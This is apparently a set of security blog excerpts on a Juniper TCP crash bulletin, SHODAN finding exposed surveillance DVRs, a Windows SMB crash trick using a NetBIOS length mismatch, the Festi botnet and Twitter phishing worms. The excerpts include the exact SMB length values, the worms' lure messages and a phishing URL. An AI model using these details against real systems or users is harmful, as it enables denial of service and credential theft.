A report has been received from Juniper at 4:25pm under bulletin PSN-2010-01-623 that a crafted malformed TCP field option in the TCP header of a packet will cause the JUNOS kernel to core (crash).
We have been continuing to play around with the SHODAN Computer Search Engine after first looking at it last week. We continue to identify a variety of devices we sometimes note on security engagements (although usually on internal networks) that: should not be externally accessible and are either still using factory default credentials or are not using any credentials to access administrative interfaces. Accessing the administrative panels of these devices would allow a bad actor to further compromise the organization running the device on its network. We can quantify that we are seeing results not just for poorly configured home offices or small businesses, but large and medium businesses who would experience significant negative effects when breached or their devices tampered with. We’ll continue to blog about our findings until we get bored with it. Today’s search demonstrates how we found a few hundred accessible interfaces for IP Camera DVR surveillance systems.
IT Administrators responsible for the servers whose listening services are showing up in the search results of the new SHODAN Computer Search Engine should pray that the ethical restrictions of those ‘shodanning’ (googling counterpart?) or searching remain intact. Or better start the implementation of countermeasures (close unnecessary ports, etc).
Python code was posted today by Laurent Gaffie on his blog, demonstrating a much too easy way to remotely crash a Windows 7 or Windows Server 2008 machine. The crash is caused by sending a NetBIOS header which specifies that the SMB packet is 4 bytes smaller or larger than it actually is. In this code sample below, you can see that the header has the length of the packet set to 9a rather than 9e (4 bytes smaller).
On Thursday, Darren Lewis of MessageLabs, the venerable e-mail security firm now owned by Symantec, published findings for a new botnet called Festi which rocketed into a top ten spot in the rankings of the largest spam sending botnets in September. First classified in August, Festi rose in September to propagating a high water mark of around three billion spam messages per day.
The Twitter worm/twishing attack of the other day has caught some interesting casualties in its net, most notably Marco Rubio a former Speaker of the Florida House of Representatives and a viable candidate for one of Florida’s Senate seats in 2010 and Zach Wamp, a candidate for Governor of Tennessee and a 14 year U.S. congressional representative.
A new twitter worm is being reported making the rounds this morning, which is actually an expertly crafted variant of the worm we reported back on September 24th. The variant has changed the direct message from “ROFL, this you on here?” to “hi. this you on here?”. The bad actor in China has also used a new URL, but with the same Twitter login landing page identifiable by its stray HTML brace “>” following the line under ‘Sign in to Twitter’. This important difference in wording should allow for a spate of new captured twitter credentials.
A phish phry is a social gathering, and early Wednesday the FBI, US Attorney’s Office, the LA Electronic Crimes Task Force, and Egyptian authorities started working towards arranging the largest gathering of suspects indicted in connection with a single phishing scam to date. Dubbed “Operation Phish Phry”, this two year inter-agency inter-country investigation is rounding up 100 suspects including 53 from North Carolina, Las Vegas, and Los Angeles as well as 47 in Egypt accused of stealing more than a million dollars from two U.S. banks.
At 2pm on Wednesday 9/24, wide scale reports started showing up on Twitter that a new Twitter worm sends you a direct message with the content “rofl this you on here? http://videos.twitter.secure-logins01.com”. The link opens a Twitter style log in page (albeit Twitter’s previous version of this page, they have a new one) which, except for being an old version and a stray angle bracket is convincing. Upon logging in the user’s credentials are stolen, and presumably direct messages are sent to each follower that user has.
